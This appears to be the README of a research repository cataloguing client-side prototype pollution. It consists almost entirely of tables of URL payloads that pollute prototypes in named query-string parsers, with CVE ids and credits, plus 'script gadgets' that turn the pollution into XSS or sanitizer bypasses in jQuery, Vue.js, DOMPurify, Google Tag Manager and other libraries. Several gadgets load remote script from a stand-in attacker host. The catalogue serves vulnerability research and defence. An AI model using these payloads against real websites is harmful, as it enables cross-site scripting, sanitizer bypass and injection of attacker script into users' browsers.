Client-Side Prototype Pollution

Intro

If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.

Prototype Pollution

Name Payload Refs Found by
Wistia Embedded Video (Fixed) ?__proto__[test]=test
?__proto__.test=test
[1] William Bowling
jQuery query-object plugin
CVE-2021-20083
?__proto__[test]=test
#__proto__[test]=test
Sergey Bobrov
jQuery Sparkle
CVE-2021-20084
?__proto__.test=test
?constructor.prototype.test=test
Sergey Bobrov
V4Fire Core Library ?__proto__.test=test
?__proto__[test]=test
?__proto__[test]={"json":"value"}
Sergey Bobrov
backbone-query-parameters
CVE-2021-20085
?__proto__.test=test
?constructor.prototype.test=test
?__proto__.array=1|2|3
[1] Sergey Bobrov
jQuery BBQ
CVE-2021-20086
?__proto__[test]=test
?constructor[prototype][test]=test
Sergey Bobrov
jquery-deparam
CVE-2021-20087
?__proto__[test]=test
?constructor[prototype][test]=test
Sergey Bobrov
MooTools More
CVE-2021-20088
?__proto__[test]=test
?constructor[prototype][test]=test
Sergey Bobrov
Swiftype Site Search (Fixed) #__proto__[test]=test [1] s1r1us
CanJS deparam ?__proto__[test]=test
?constructor[prototype][test]=test
Rahul Maini
Purl (jQuery-URL-Parser)
CVE-2021-20089
?__proto__[test]=test
?constructor[prototype][test]=test
#__proto__[test]=test
Sergey Bobrov
HubSpot Tracking Code (Fixed) ?__proto__[test]=test
?constructor[prototype][test]=test
#__proto__[test]=test
Sergey Bobrov
YUI 3 querystring-parse ?constructor[prototype][test]=test Sergey Bobrov
Mutiny (Fixed) ?__proto__.test=test SPQR
jQuery parseParams ?__proto__.test=test
?constructor.prototype.test=test
POSIX
php.js parse_str ?__proto__[test]=test
?constructor[prototype][test]=test
POSIX
arg.js ?__proto__[test]=test
?__proto__.test=test
?constructor[prototype][test]=test
#__proto__[test]=test
POSIX
davis.js ?__proto__[test]=test POSIX
Component querystring ?__proto__[NUMBER]=test
?__proto__[123]=test
Masato Kinugawa
Aurelia path ?__proto__[test]=test [1] s1r1us
analytics-utils < 1.0.3 ?__proto__[test]=test
?constructor[prototype][test]=test
[1] alexdaviestray

Script Gadgets

Name Payload Impact Refs Found by
Wistia Embedded Video ?__proto__[innerHTML]=<img/src/onerror%3dalert(1)> XSS [1] William Bowling
jQuery $.get ?__proto__[context]=<img/src/onerror%3dalert(1)>
&__proto__[jquery]=x
XSS Sergey Bobrov
jQuery $.get >= 3.0.0
Boolean.prototype
?__proto__[url][]=data:,alert(1)//
&__proto__[dataType]=script
XSS Michał Bentkowski
jQuery $.get >= 3.0.0
Boolean.prototype
?__proto__[url]=data:,alert(1)//
&__proto__[dataType]=script
&__proto__[crossDomain]=
XSS Sergey Bobrov
jQuery $.getScript >= 3.4.0 ?__proto__[src][]=data:,alert(1)// XSS s1r1us
jQuery $.getScript 3.0.0 - 3.3.1
Boolean.prototype
?__proto__[url]=data:,alert(1)// XSS s1r1us
jQuery $(html) ?__proto__[div][0]=1
&__proto__[div][1]=<img/src/onerror%3dalert(1)>
XSS Sergey Bobrov
jQuery $(x).off
String.prototype
?__proto__[preventDefault]=x
&__proto__[handleObj]=x
&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)>
XSS Sergey Bobrov
Google reCAPTCHA ?__proto__[srcdoc][]=<script>alert(1)</script> XSS s1r1us
Twitter Universal Website Tag ?__proto__[hif][]=javascript:alert(1) XSS Sergey Bobrov
Tealium Universal Tag ?__proto__[attrs][src]=1
&__proto__[src]=data:,alert(1)//
XSS Sergey Bobrov
Akamai Boomerang ?__proto__[BOOMR]=1
&__proto__[url]=//attacker.tld/js.js
XSS s1r1us
Lodash <= 4.17.15 ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) XSS [1] Alex Brasetvik
sanitize-html ?__proto__[*][]=onload Bypass [1] Michał Bentkowski
sanitize-html ?__proto__[innerText]=<script>alert(1)</script> Bypass [1] Hpdoger
js-xss ?__proto__[whiteList][img][0]=onerror
&__proto__[whiteList][img][1]=src
Bypass [1] Michał Bentkowski
DOMPurify <= 2.0.12 ?__proto__[ALLOWED_ATTR][0]=onerror
&__proto__[ALLOWED_ATTR][1]=src
Bypass [1] Michał Bentkowski
DOMPurify <= 2.0.12 ?__proto__[documentMode]=9 Bypass [1] Michał Bentkowski
Google Closure ?__proto__[*%20ONERROR]=1
&__proto__[*%20SRC]=1
Bypass [1] Michał Bentkowski
Google Closure ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// XSS [1] Michał Bentkowski
Marionette.js / Backbone.js ?__proto__[tagName]=img
&__proto__[src][]=x:
&__proto__[onerror][]=alert(1)
XSS Sergey Bobrov
Adobe Dynamic Tag Management ?__proto__[src]=data:,alert(1)// XSS Sergey Bobrov
Adobe Dynamic Tag Management ?__proto__[SRC]=<img/src/onerror%3dalert(1)> XSS Sergey Bobrov
Swiftype Site Search ?__proto__[xxx]=alert(1) XSS s1r1us
Embedly Cards ?__proto__[onload]=alert(1) XSS Guilherme Keerok
Segment Analytics.js ?__proto__[script][0]=1
&__proto__[script][1]=<img/src/onerror%3dalert(1)>
XSS Sergey Bobrov
Knockout.js
Array.prototype
?__proto__[4]=a':1,[alert(1)]:1,'b
&__proto__[5]=,
XSS Michał Bentkowski
Zepto.js ?__proto__[onerror]=alert(1) XSS [1] lih3iu
Zepto.js ?__proto__[html]=<img/src/onerror%3dalert(1)> XSS Sergey Bobrov
Sprint.js ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> XSS [1] lih3iu
Vue.js ?__proto__[v-if]=_c.constructor('alert(1)')() XSS POSIX
Vue.js ?__proto__[attrs][0][name]=src
&__proto__[attrs][0][value]=xxx
&__proto__[xxx]=data:,alert(1)//
&__proto__[is]=script
XSS [1] s1r1us
Vue.js ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() XSS [1] r00timentary
Vue.js ?__proto__[data]=a
&__proto__[template][nodeType]=a
&__proto__[template][innerHTML]=<script>alert(1)</script>
XSS [1] SuperGuesser
Vue.js ?__proto__[props][][value]=a
&__proto__[name]=":''.constructor.constructor('alert(1)')(),"
XSS [1] st98_
Vue.js ?__proto__[template]=<script>alert(1)</script> XSS [1] huli
Demandbase Tag ?__proto__[Config][SiteOptimization][enabled]=1
&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?
XSS SPQR
@analytics/google-tag-manager ?__proto__[customScriptSrc]=//attacker.tld/xss.js XSS SPQR
i18next ?__proto__[lng]=cimode
&__proto__[appendNamespaceToCIMode]=x
&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)>
Potential XSS Sergey Bobrov
i18next < 19.8.5 ?__proto__[lng]=a
&__proto__[a]=b
&__proto__[obj]=c
&__proto__[k]=d
&__proto__[d]=<img/src/onerror%3dalert(1)>
Potential XSS Sergey Bobrov
i18next >= 19.8.5 ?__proto__[lng]=a
&__proto__[key]=<img/src/onerror%3dalert(1)>
Potential XSS Sergey Bobrov
Google Analytics ?__proto__[cookieName]=COOKIE%3DInjection%3B Cookie Injection Sergey Bobrov
Popper.js ?__proto__[arrow][style]=color:red;transition:all%201s
&__proto__[arrow][ontransitionend]=alert(1)

?__proto__[reference][style]=color:red;transition:all%201s
&__proto__[reference][ontransitionend]=alert(2)

?__proto__[popper][style]=color:red;transition:all%201s
&__proto__[popper][ontransitionend]=alert(3)
XSS [1] [2] Matheus Vrech
Pendo Agent ?__proto__[dataHost]=attacker.tld/js.js%23 XSS Renwa
script.aculo.us
String.constructor
?x=x
&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>
XSS Sergey Bobrov
hCaptcha (Fixed) ?__proto__[assethost]=javascript:alert(1)// XSS Masato Kinugawa
Google Closure ?__proto__[trustedTypes]=x
&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>
XSS Mathias Karlsson
Google Tag Manager ?__proto__[vtp_enableRecaptcha]=1
&__proto__[srcdoc]=<script>alert(1)</script>
XSS terjanq
Google Tag Manager ?__proto__[q][0][0]=require
&__proto__[q][0][1]=x
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7
XSS Sergey Bobrov /
Masato Kinugawa
Google Analytics ?__proto__[q][0][0]=require
&__proto__[q][0][1]=x
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7
XSS Sergey Bobrov /
Masato Kinugawa